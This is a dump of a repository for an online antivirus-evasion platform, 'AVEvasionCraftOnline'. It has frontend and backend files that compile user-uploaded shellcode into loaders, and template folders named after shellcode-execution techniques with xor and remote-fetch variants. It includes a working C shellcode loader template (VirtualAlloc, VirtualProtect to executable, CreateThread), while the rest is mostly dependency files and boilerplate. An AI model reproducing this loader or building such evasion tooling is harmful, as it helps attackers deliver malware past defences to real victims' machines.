| require ( 6 | github.com/andybalholm/brotli v1.0.5 // indirect 7 | github.com/klauspost/compress v1.17.0 // indirect 8 | github.com/valyala/bytebufferpool v1.0.0 // indirect 9 | github.com/valyala/fasthttp v1.51.0 // indirect 10 | golang.org/x/sys v0.16.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 | require ( 6 | github.com/andybalholm/brotli v1.0.5 // indirect 7 | github.com/klauspost/compress v1.17.0 // indirect 8 | github.com/valyala/bytebufferpool v1.0.0 // indirect 9 | github.com/valyala/fasthttp v1.51.0 // indirect 10 | golang.org/x/sys v0.16.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require ( 6 | github.com/valyala/fasthttp v1.52.0 7 | golang.org/x/sys v0.20.0 8 | ) 9 | 10 | require ( 11 | github.com/andybalholm/brotli v1.1.0 // indirect 12 | github.com/klauspost/compress v1.17.6 // indirect 13 | github.com/valyala/bytebufferpool v1.0.0 // indirect 14 | ) 15 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/utils/auth.js: -------------------------------------------------------------------------------- 1 | import Cookies from 'js-cookie' 2 | 3 | const TokenKey = 'bbs_pro_token' 4 | 5 | export function getToken() { 6 | return Cookies.get(TokenKey) 7 | } 8 | 9 | export function setToken(token) { 10 | return Cookies.set(TokenKey, token) 11 | } 12 | 13 | export function removeToken() { 14 | return Cookies.remove(TokenKey) 15 | } 16 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require ( 6 | github.com/valyala/fasthttp v1.52.0 7 | golang.org/x/sys v0.20.0 8 | ) 9 | 10 | require ( 11 | github.com/andybalholm/brotli v1.1.0 // indirect 12 | github.com/klauspost/compress v1.17.6 // indirect 13 | github.com/valyala/bytebufferpool v1.0.0 // indirect 14 | ) 15 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | pnpm-debug.log* 8 | lerna-debug.log* 9 | 10 | node_modules 11 | dist 12 | dist-ssr 13 | *.local 14 | 15 | # Editor directories and files 16 | .vscode/* 17 | !.vscode/extensions.json 18 | .idea 19 | .DS_Store 20 | *.suo 21 | *.ntvs* 22 | *.njsproj 23 | *.sln 24 | *.sw? 25 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 在线免杀平台 8 | 9 | 10 | 11 |
12 | 13 | 14 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/ShellcodeProcessorTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 4 | import org.junit.jupiter.api.Test; 5 | 6 | import java.io.IOException; 7 | 8 | import static org.junit.jupiter.api.Assertions.*; 9 | 10 | class ShellcodeProcessorTest { 11 | 12 | @Test 13 | void transformation() throws IOException { 14 | 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.eslintrc.cjs: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | env: { 3 | browser: true, 4 | es2021: true 5 | }, 6 | extends: ['eslint:recommended', 'plugin:vue/vue3-essential'], 7 | overrides: [], 8 | parserOptions: { 9 | ecmaVersion: 'latest', 10 | sourceType: 'module' 11 | }, 12 | plugins: ['vue'], 13 | rules: {}, 14 | globals: { 15 | defineProps: 'readonly', 16 | defineEmits: 'readonly', 17 | defineExpose: 'readonly', 18 | withDefaults: 'readonly' 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/assets/vue.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/AvEvasionCraftOnlineApplication.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class AvEvasionCraftOnlineApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(AvEvasionCraftOnlineApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/components/HelloWorld.vue: -------------------------------------------------------------------------------- 1 | 9 | 10 | 21 | 22 | 27 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/api/compile.js: -------------------------------------------------------------------------------- 1 | import request from '../utils/request.js' 2 | 3 | export function fetchConfig() { 4 | return request({ 5 | url: `/api/avevasion/config`, 6 | method: 'get' 7 | }) 8 | } 9 | 10 | export function fetchDownloadLink(endpoint) { 11 | return request({ 12 | url: `/api${endpoint}`, 13 | method: 'get', 14 | responseType: 'blob' 15 | }) 16 | } 17 | 18 | export function fetchCompileUpload(data) { 19 | return request({ 20 | url: `/api/compiler`, 21 | method: 'post', 22 | data, 23 | }) 24 | } 25 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/.gitignore: -------------------------------------------------------------------------------- 1 | HELP.md 2 | target/ 3 | src/main/resources/static/ 4 | !.mvn/wrapper/maven-wrapper.jar 5 | !**/src/main/**/target/ 6 | !**/src/test/**/target/ 7 | 8 | ### STS ### 9 | .apt_generated 10 | .classpath 11 | .factorypath 12 | .project 13 | .settings 14 | .springBeans 15 | .sts4-cache 16 | 17 | ### IntelliJ IDEA ### 18 | .idea 19 | *.iws 20 | *.iml 21 | *.ipr 22 | 23 | ### NetBeans ### 24 | /nbproject/private/ 25 | /nbbuild/ 26 | /dist/ 27 | /nbdist/ 28 | /.nb-gradle/ 29 | build/ 30 | !**/src/main/**/build/ 31 | !**/src/test/**/build/ 32 | 33 | ### VS Code ### 34 | .vscode/ 35 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/CompilerCodeTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.util.Arrays; 6 | 7 | import static org.junit.jupiter.api.Assertions.*; 8 | 9 | class CompilerCodeTest { 10 | 11 | @Test 12 | void compileNim() { 13 | } 14 | 15 | @Test 16 | void compileGo() { 17 | } 18 | 19 | @Test 20 | void compileC() { 21 | String code = "C:\\1bypassAVOnline\\template\\nim\\v1\\v1.nim"; 22 | // CompilerCode.compileNim(code); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /template/c/c_VirtualAlloc/none/c_VirtualAlloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | unsigned char calc_payload[{{Len}}] = { 4 | {{Shellcode}} 5 | }; 6 | 7 | unsigned int payload_len = sizeof(calc_payload); 8 | 9 | int main(void) { 10 | 11 | PVOID calcSt; 12 | HANDLE calcTH; 13 | DWORD oldProtectCalc = 0; 14 | calcSt = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 15 | RtlMoveMemory(calcSt, calc_payload, payload_len); 16 | VirtualProtect(calcSt, payload_len, PAGE_EXECUTE_READ, &oldProtectCalc); 17 | calcTH = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) calcSt, 0, 0, 0); 18 | WaitForSingleObject(calcTH, -1); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/README.md: -------------------------------------------------------------------------------- 1 | # BypassAVOnline-Front 2 | 3 | 4 | #### 技术栈 5 | 6 | - Vite3 7 | - Vue3 8 | - Vuex 9 | - Vue Router 10 | - Axios 11 | - element-plus 12 | - vueuse 13 | - js-cookie 14 | - normalize.css 15 | - eslint + prettier 16 | 17 | …… 18 | 19 | 20 | #### 常用指令 21 | 22 | - 安装 23 | 24 | ``` 25 | yarn install 26 | ``` 27 | 28 | - 启动 29 | 30 | ``` 31 | yarn dev 32 | ``` 33 | 34 | - 编译 35 | 36 | ``` 37 | yarn build 38 | ``` 39 | 40 | - 检查和修复文件 41 | 42 | ``` 43 | yarn lint 44 | ``` 45 | 46 | - 格式化代码 47 | 48 | ``` 49 | yarn format 50 | ``` 51 | 52 | #### 更多自定义配置 53 | 54 | See [Configuration Reference](https://cli.vuejs.org/config/). 55 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/api/user.js: -------------------------------------------------------------------------------- 1 | import request from '../utils/request.js' 2 | 3 | export function getCode() { 4 | return request({ 5 | url: '/captcha', 6 | method: 'get' 7 | }) 8 | } 9 | 10 | export function login(data) { 11 | return request({ 12 | url: '/vue-admin-template/user/login', 13 | method: 'post', 14 | data 15 | }) 16 | } 17 | 18 | export function getInfo(token) { 19 | return request({ 20 | url: '/vue-admin-template/user/info', 21 | method: 'get', 22 | params: { token } 23 | }) 24 | } 25 | 26 | export function logout() { 27 | return request({ 28 | url: '/vue-admin-template/user/logout', 29 | method: 'post' 30 | }) 31 | } 32 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/service/CompileService.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.service; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.CompilationResponseDTO; 4 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 5 | 6 | import java.io.IOException; 7 | 8 | public interface CompileService { 9 | 10 | CompilationResponseDTO compileCodeC(ShellcodeUploadDTO shellcodeUploadDTO) throws IOException; 11 | CompilationResponseDTO compileCodeNim(ShellcodeUploadDTO shellcodeUploadDTO) throws IOException; 12 | CompilationResponseDTO compileCodeGo(ShellcodeUploadDTO shellcodeUploadDTO) throws IOException; 13 | } 14 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/controller/BypassAVConfigController.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.controller; 2 | 3 | import com.yutian4060.avevasioncraftonline.config.BypassAVConfigProperties; 4 | import org.springframework.beans.factory.annotation.Autowired; 5 | import org.springframework.web.bind.annotation.*; 6 | 7 | @RestController 8 | @RequestMapping("/api") 9 | public class BypassAVConfigController { 10 | 11 | @Autowired 12 | private BypassAVConfigProperties configProperties; 13 | 14 | @GetMapping("/avevasion/config") 15 | public BypassAVConfigProperties getConfig() { 16 | return configProperties; 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/main.js: -------------------------------------------------------------------------------- 1 | import './style.css' 2 | 3 | import router from './router' 4 | import store from './store' 5 | 6 | import { createApp } from 'vue' 7 | import ElementPlus from 'element-plus' 8 | import 'element-plus/dist/index.css' 9 | import App from './App.vue' 10 | 11 | import 'element-plus/theme-chalk/dark/css-vars.css' // ep-dark-css 12 | import './style-dark.css' // dark-style 13 | import 'normalize.css' 14 | import * as ElementPlusIconsVue from '@element-plus/icons-vue' 15 | 16 | 17 | const app = createApp(App) 18 | for (const [key, component] of Object.entries(ElementPlusIconsVue)) { 19 | app.component(key, component) 20 | } 21 | app.use(router).use(store).use(ElementPlus).mount('#app') -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/REMOTE/go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= 2 | github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= 3 | github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= 4 | github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= 5 | github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= 6 | github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= 7 | github.com/valyala/fasthttp v1.52.0 h1:wqBQpxH71XW0e2g+Og4dzQM8pk34aFYlA1Ga8db7gU0= 8 | github.com/valyala/fasthttp v1.52.0/go.mod h1:hf5C4QnVMkNXMspnsUlfM3WitlgYflyhHYoKol/szxQ= 9 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/router/index.js: -------------------------------------------------------------------------------- 1 | import { createRouter, createWebHistory } from 'vue-router' 2 | 3 | const routes = [ 4 | { 5 | path: '/', 6 | name: 'bypass', 7 | component: () => 8 | import(/* webpackChunkName: "about" */ '../views/BypassAV.vue') 9 | }, 10 | { 11 | path: '/about', 12 | name: 'about', 13 | // route level 